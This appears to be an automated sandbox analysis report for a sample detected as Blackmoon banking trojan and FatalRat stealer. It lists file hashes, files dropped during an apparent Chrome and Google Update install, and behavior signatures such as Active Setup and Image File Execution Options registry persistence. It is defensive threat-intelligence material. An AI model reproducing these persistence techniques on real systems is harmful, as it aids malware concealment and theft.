SHA512 933c181d7575f20480c8deadac3f3e9190081456169122216c72e7b9a04aa75612140fc37697098c7c20b77001a67966fa1661cdc9110c40634c944f833a65b1

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_da.dll

MD5 9f2e018a4f9a1d278983d0b677b91218
SHA1 c58ee1fc0d8ef9d99f85426b48c7f28f381a2c17
SHA256 d0dcdc68236eecd6b5f0b437eb92b8935741dabf1fa276a552399815af22edec
SHA512 20b74b6a9f81527d4a5fe30671d2559261fb682576f4ab04da7856280fbbaeb6af83894009c9d7cb83deeae988d0ac5ec7ec32b277b7eb45829faec2857d7014

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_cs.dll

MD5 b9033db8d0e5bf254979b0f47d10e93d
SHA1 2859de0d851b5f4fd3056e8f9015cece2436c307
SHA256 12c41c2f472b6a05fd6392e9d4f8aeb9a40840c2cbefd68b39d20f9d1d4d77ed
SHA512 52075df4ae5c86ebb0bac20604ea072a163761ae058c1473211bf4bb0eeed043cfc5a92386f876b53484cdf4e3f8a7b75d8f4bf9894c24f8c22ec23a50b70b7c

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ca.dll

MD5 39e25ba8d69f493e6f18c4ef0cf96de8
SHA1 5584a94a85d83514a46030c4165e8f7a942e63e2
SHA256 1f66ebdcaae482a201a6e0fab9c1f4501c23a0d4ad819ccd555fdca9cc7edb94
SHA512 773c995b449d64e36eb8cab174db29e29e29985bcfd714799d6b05b01bb7d4a0fc2aefaf2e27ff02b0e105fbe0d34d7efe29b193a1bc3365ec47e1f1003bed26

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bn.dll

MD5 dafa45a82ce30cf2fd621e0a0b8c031f
SHA1 e39ed5213f9bb02d9da2c889425fab8ca6978db7
SHA256 d58e5f0fa894123de1d9b687a5b84826e095eca128ee5df8870f2db74f4233a2
SHA512 2b772ebc128eb59d636eec36583329962ead8e0a399fd56394b1244486bf815f4e033ceef74a62a9930ab2bf6ec1ba5e2d3c942183f7cb2355a716a3e2c6c7a1

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bg.dll

MD5 c523ec13643d74b187b26b410d39569b
SHA1 46aff0297036c60f22ad30d4e58f429890d9e09d
SHA256 80505863866bcd93a7e617dd8160531401d6d05f48d595348cd321cf7d97aeac
SHA512 ecf98e29a3481b05ab23c3ff89fa3caf054b874ed15462a5e33022aacf561d8fea4a0de35cc5f7450f62110ca4ace613e0c67f543ad22eb417e79eb3ebf24ed7

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ar.dll

MD5 163695df53cea0728f9f58a46a08e102
SHA1 71b39eec83260e2ccc299fac165414acb46958bd
SHA256 f89dddda3e887385b42ea88118ba8fb1cc68fde0c07d44b851164564eb7c1ec8
SHA512 6dfb70a175097f3c96ae815a563c185136cb5a35f361288cc81570facfa1f1d28f49eaa61172d1da4982ebb76bd3e32c4de77cf97dedfb79f18113d7594d0989

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_am.dll

MD5 849bc7e364e30f8ee4c157f50d5b695e
SHA1 b52b8efa1f3a2c84f436f328decd2912efeb1b18
SHA256 f1384a25a6f40e861455c62190d794415f3e9bfca6317c214847e9535dfc3fb9
SHA512 6fd7f542a7073b3bbf1b0c200bb306b30f1b35a64a1fb013f25c7df76f63ef377d9bd736e8da2e9372f1c994785eaeedb6b60e3a0d4a4e8734c266ad61782d3b

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateComRegisterShell64.exe

MD5 be535d8b68dd064442f73211466e5987
SHA1 aa49313d9513fd9c2d2b25da09ea24d09cc03435
SHA256 c109bcb63391ac3ea93fb97fbdf3f6ed71316cacb592ef46efaea0024bc9ed59
SHA512 eb50eebeaf83be10aea8088e35a807f9001d07d17d2bc1655c3bc0cb254d0f54303348988514ba5590ebd9d3bde3f1149c3f700f62fbce63c0199ea3cfb1f638

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler64.exe

MD5 b659663611a4c2216dff5ab1b60dd089
SHA1 9a14392a5bdb9ea6b8c3e60224b7ff37091d48b5
SHA256 cad4aa1cf58f6b2e2aceb789d53b18418e67066ec406b2fac786cb845ef89d2b
SHA512 1065f9072cd6f1f4364f1354108f2647ee1d89f87e908a22fcd63bd3149c864c457e62268067a439d0486d8d4aa150aa984ad8ac8b51cae49014b67b80496040

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler.exe

MD5 a11ce10ac47f5f83b9bc980567331a1b
SHA1 63ee42e347b0328f8d71a3aa4dde4c6dc46da726
SHA256 101dbf984c4b3876defe2699d6160acbf1bb3f213e02a32f08fdcdc06821c542
SHA512 ff2f86c4061188ead1bfeebd36de7dbc312adcc95267537697f2bfcbb0c53e7c4ab0cd268cef22f0182391796c4612c97cbdc1266d9ee1960cdd2610d8c2bcb3

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateCore.exe

MD5 af51ea4d9828e21f72e935b0deae50f2
SHA1 c7fe57c2a16c9f5a5ebdd3cc0910427cba5308bd
SHA256 3575011873d0f6d49c783095dae06e6619f8f5463da578fbe284ca5d1d449619
SHA512 ec9828d0bade39754748fb53cfc7efdc5e57955198bac3c248ea9b5a9a607182bb1477819f220549a8e9eadbe6bf69a12da6c8af3761980d2dd9078eaeaa932f

memory/1388-201-0x0000000000400000-0x000000000090B000-memory.dmp

C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe

MD5 3eda07f3f5bd229c5a02ca9487dd152d
SHA1 b6b845c42e2316b63a61a058eb1a9714211a54ec
SHA256 cba6ac1785a616fbffb09afb29cc8b5d9a82a019d9b547338aa09b6a06905e11
SHA512 e8a0d0308f955f923753380033ebf12a795d9e3dd57e155e46ff6d709c9a4a71a24227b79a129773e6209eb1039202928a9515294833b36c218f44d787349aa6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8426aa715bdd00ab28f4267180313b8b
SHA1 ea121247cbb4de5fae01368b737a314089c857da
SHA256 8035925f02dd360737f0a54708c7dc09906f665d0c1c4a7d8852449918b82053
SHA512 1e0ec39bfe43df00e0ea970b75d5e546358b28f096d7c2d90ec563cdb01a2cbdaff6ff68bb0d8b7269761cd48597d0bb5de1af2c54348b71288c63f54cc8687d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

MD5 505a174e740b3c0e7065c45a78b5cf42
SHA1 38911944f14a8b5717245c8e6bd1d48e58c7df12
SHA256 024ae694ba44ccd2e0914c5e8ee140e6cc7d25b3428d6380102ba09254b0857d
SHA512 7891e12c5ec14b16979f94da0c27ac4629bae45e31d9d1f58be300c4b2bbaee6c77585e534be531367f16826ecbaf8ec70fc13a02beaf36473c448248e4eb911

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 b77fc97eecd8f7383464171a4edef544
SHA1 bbae26d2a7914a3c95dca35f1f6f820d851f6368
SHA256 93332c49fab1deb87dac6cb5d313900cb20e6e1ba928af128a1d549a44256f68
SHA512 68745413a681fdf4088bf8d6b20e843396ae2e92fbb97239dc6c764233a7e7b700a51548ff4d2ea86420b208b92a5e5420f08231637fbb5dbf7e12a377be3fc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\64.png

MD5 0aa5ac35c79f5cb38dd5fafbabf2983c
SHA1 36658f24dbb49f5ff2a19897b22071f72e523f12
SHA256 3695587d1d40ba3171aa991cb77e6c9080b550db7c3d3b52097c1723ab060f32
SHA512 fcbc8a65c4b852c848a13fa12131fa7b17b1310ad3278e78545e8334ddf199b627110bde2fc0a5e7312fad3a5f12b0db54c665d00f1feb1cf3b7c4b18e7569e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\48.png

MD5 5bfbb6b6a7e313f5d67a1219f7866c4a
SHA1 c49ec46ca5fb945b582c99b47a2b7c09da8f766e
SHA256 6dc4e5c4c1722173cb9d40e7edd2947c12677b12fd2fdd6e2544bda6bb456ab1
SHA512 55928faf39965083855cf6e1a8bc477560b41f3d8d8f678de7271960c6b59b7f2a256ae4e03428f86c1fc0e431370512e9c69a5631cad9e103e8978faa10ac13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons\32.png

MD5 a3a00ef924278ba60be0fffeec04995e
SHA1 69ab25402bb5ef6d99538ec8044c6edb128be0d3
SHA256 a5670fe56dbae316511d6f8c7349477c69c53dc59fe5615984eed5c8cf55a717
SHA512 fd53f2c0e8f493817f5ff5c2f9b87ffb82a11bc2b56a9798072efdf22677d2760bc489a2c8d76fdee6f65a0f4509d4bc257851811b4f720120780e796c6bc4b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1712_1657648540\Icons\128.png

MD5 654cafa7846b64b91835e202c3efca65
SHA1 4e0fa549b16a47ca9e22e0a510229f528740d51b
SHA256 956bd19ad9a62b83792bed90a6e6457e0812abb36ef85763f62883d70f65241b
SHA512 65db6e4824ee4caa38fa4ec837c2ee4290e34c8d2c5099b33720e7b6ab83997608ae8a6d47961d8506be3d23606b179cf792cc040a7c6c3f251855c294b26223

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 1b73803ecd8b858c83f030aaf637b550
SHA1 7bb64cde57924420b03f38da4d95cb4b0d113c87
SHA256 f56cab9a254f3411bb5f3415705662040a08ff6777ead282dcb36bd2c1a5128b
SHA512 9ae855343ed541f886db63353ad6ef84071adabdee05fdc8cad2234a6b21e91ad08beb8a841f456619b9a07c9c2c3bb5f515912fb304189d78162219a2077b40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 66cb094cebf8dca17115863cd23c3547
SHA1 340c470920c30a80edfe832e373afd582aa07861
SHA256 c080b6db495e5df073e014e5bd3d34a7ef88acb5bf28cb3d24ea23119e59de19
SHA512 ed2d405f51146ae2f430d3c4e5523ef360db59494070aec84a9632135e90e9d8226d0b71d76de3c4ad11cc652399166766594b02d141f1cf2e02d1fedc3e5908

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ce3bf0cfbf684e7ef79e512ce3b3b4c6
SHA1 17a50f2b449933a266643511011cec47f50ab729
SHA256 3e3ea5d08f03f35ed36b6fc5cb408230cb4d10e2d0ee01cf38a88e4534b6198b
SHA512 87d8af2912404ccb17281078e1963fbeccbae039349184826a644c5e91e3240c9eee96b7847e069ae5f7cda11748ca52f6d00615243157f591d7a5e935fba836

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5cf7ed12-b323-474f-9b3b-364961357b94.tmp

MD5 93f6aae11e85df57b2e4b8b4f63c45c8
SHA1 f05854aa2286a6ad786e576eccb49b8c8aa345f1
SHA256 7dd59e42f29d5333c1e285c816a30b3b9d4b600ea3ad993629a2c87577ad59eb
SHA512 913897cec0f1d8ebc5bc8d20bc56fccf21e9157aa03e562734c17f93c26741d9524940c2d6e3dff0dc7ffc0c92403f5e25b5bb7b89fa0275e7067380c1b8c952

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 262254a971f053509f427a766c0a8871
SHA1 7fe742f9537196a258757051ba1ab31e244ff285
SHA256 c40ff604199abc509f210a2dd2786e68b676684d91ecaa345c7ee900c0c7915e
SHA512 a510c251cf5012188e38abdf284079b57e132d8a63a095a7695a76313bfb8829ea445fc3e0712fa58e3143f503c22bf9ac53a87b1f600c2e7f3be836451def9b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ab09fbc4df6052221e0ecfd98e8dcec9
SHA1 df2ab1e16493009d3bee4c99f625d52cf0126915
SHA256 aceb5508018c9557203b10112eef41cd76c8eaa33bad5485dc9cea416fb41a54
SHA512 0a9d747ed4ac839c0a28f9df9e6e4ee08f41f976b5dcfc71510517d41d4f1994e47e3afefd11f2ca397935500e9351db91da2180b561c54d0456de3851c322b3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 2033081fb0bbe4d85e918c7a062cfae0
SHA1 c258d73446aa30b38e4ea1b2f9bdeeca26ced9ed
SHA256 a66cb240ffe4be18107626196f594154e67d484845f849062760871ea7d3878e
SHA512 fdc8bb13b1a54f113826d8713fa1cf1eb5588b23fd27eb4a1007b09b50ccdf49407cd6559faf1975e55ce92aaa7dbcaacb65feace9fc954cb14eeda76500f19a

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.json

MD5 01c878f43569459b9671819276fc381a
SHA1 c04140758f7fd681cc55acf2b02d988f13aef25c
SHA256 6000afa1b02202ed4821c24bbdd88cea539c2cb4d0ef7033bd5d3e6b4ddee430
SHA512 f80b39516cedd3108676e4c41c19fb7a6d05f2a92ffcbb4ea595f111dfd5e4d14dc7de5c3c871e0fe5d90d40c6c45a8c646c324329ad7aa8fd37c1d4d0810e8f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.54.0\Filtering Rules

MD5 7c91e14b081c346267e1b1761c029f1c
SHA1 40d2665fd0042a5aaa3b8c7c451813d6c7005ead
SHA256 fd3ade759bd847f845fe201167de1f53e53a2275631303952f1ac4d7ab5b19dc
SHA512 89a269667034fc15e7ecdc3aec70375949c1ae65a944cb3d762909152c8db1c4b163aa2162698a0345889154e248b5a70b7c93182f5a853529eefd889926233d

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-21 23:06

Reported

2025-02-21 23:10

Platform

win7-20250207-en

Max time kernel

149s

Max time network

148s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\109.0.5414.120\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ms.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_el.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ja.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\icudtl.dat C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\gu.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\109.0.5414.120\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sv.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\vulkan-1.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_sl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_cs.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_100_percent.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\en-GB.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sl.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Temp\GUTF134.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ur.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_en-GB.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\nl.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_pt-PT.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_pl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sl.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\fi.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\vi.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\109.0.5414.120.manifest C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\resources.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
